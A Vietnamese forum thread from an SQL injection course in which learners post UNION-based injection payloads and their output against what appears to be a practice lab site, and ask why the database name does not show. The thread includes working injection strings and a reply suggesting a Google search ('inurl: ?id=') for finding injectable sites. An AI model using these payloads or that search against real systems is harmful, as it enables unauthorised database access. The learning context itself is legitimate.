Web4: SQL injection - Các bước khai thác
- Bắt đầu Mask
- Ngày bắt đầu
Mình đang thực hành Level 2 (Easy)
- lệnh: union select 1,2,3,4-- -
kết quả:
User-ID: 1
Username: 2
Age: 3
- lệnh: union select 1,2, version(),database()-- -
kết quả:
User-ID: 1
Username: 2
Age: 5.1.71-community-log
chỉ xuất hiện phiên bản CSDL, không hiển thị tên "bảng"
Nhờ các bạn chỉ dùm.( trong hướng dẫn câu lệnh union select 1, version(),database()-- - báo lỗi nên mình thêm union select 1,2, version(),database()-- - mới hiển thị kết quả trên)
- lệnh: union select 1,2,3,4-- -
kết quả:
User-ID: 1
Username: 2
Age: 3
- lệnh: union select 1,2, version(),database()-- -
kết quả:
User-ID: 1
Username: 2
Age: 5.1.71-community-log
chỉ xuất hiện phiên bản CSDL, không hiển thị tên "bảng"
Nhờ các bạn chỉ dùm.( trong hướng dẫn câu lệnh union select 1, version(),database()-- - báo lỗi nên mình thêm union select 1,2, version(),database()-- - mới hiển thị kết quả trên)
Comment
sao mình xem phiên bản csdl và tên csdl của link: http://www.zixem.altervista.org/SQLi/ thì chỉ có hiển thị phiên bản không có tên csdl
ItemID: 1
Item Name: 2
Seller: 5.1.71-community-log
- trong hướng dẫn đoạn "select 1,version(), database()-- -" thì báo lỗi "The used SELECT statements have a different number of columns"
- nên mình thêm như dưới thì chỉ báo phiên bản
(http://www.zixem.altervista.org/SQLi/level3.php?item=-3' unionon select 1,2,version(), database()-- -)
Mong các bạn chỉ giáo ./.
ItemID: 1
Item Name: 2
Seller: 5.1.71-community-log
- trong hướng dẫn đoạn "select 1,version(), database()-- -" thì báo lỗi "The used SELECT statements have a different number of columns"
- nên mình thêm như dưới thì chỉ báo phiên bản
(http://www.zixem.altervista.org/SQLi/level3.php?item=-3' unionon select 1,2,version(), database()-- -)
Mong các bạn chỉ giáo ./.
Comment
"statements have a different number of columns" câu này dịch ra có nghĩa là số lượng cột không trùng khớp, và bạn cũng nên biết rằng là UNION chỉ có thể thực thi khi state trước và sau UNION phải trùng số lượng cột và kiểu dữ liệu. OKE, man.
bật google, gõ vào search box: "inurl: ?id="
Are u clear ?
Comment
Mọi người cho t hỏi:
thực hành lv 3 kiểu gì thế???
mình làm không ra cái gì cả mong mọi người chỉ giúp.
http://www.zixem.altervista.org/SQLi/level3.php?item=3
thực hành lv 3 kiểu gì thế???
mình làm không ra cái gì cả mong mọi người chỉ giúp.
http://www.zixem.altervista.org/SQLi/level3.php?item=3
Comment
Bài viết này đọc qua các bước làm mình có thắc mắc 1 chú ai trả lời giúp mình được không.
1. tại sao từ bước (4. khi xác định thông tin để hiện số cột bị lỗi lại phải thêm dấu "-" vào trước số 1( id=-1 ) thì mới hiện cột lỗi vậy).
2. qua các bước làm như vậy là khai thác qua con đường nào ạ( qua user input , cookies, biến server) làm sao biết được các bước làm này là dựa vào đâu, qua con đường khai thác nào.
1. tại sao từ bước (4. khi xác định thông tin để hiện số cột bị lỗi lại phải thêm dấu "-" vào trước số 1( id=-1 ) thì mới hiện cột lỗi vậy).
2. qua các bước làm như vậy là khai thác qua con đường nào ạ( qua user input , cookies, biến server) làm sao biết được các bước làm này là dựa vào đâu, qua con đường khai thác nào.
Comment
Công cụ này là HackBar. Bạn có tìm công cụ này với từ khoá: hackbar extension for firefox github
Comment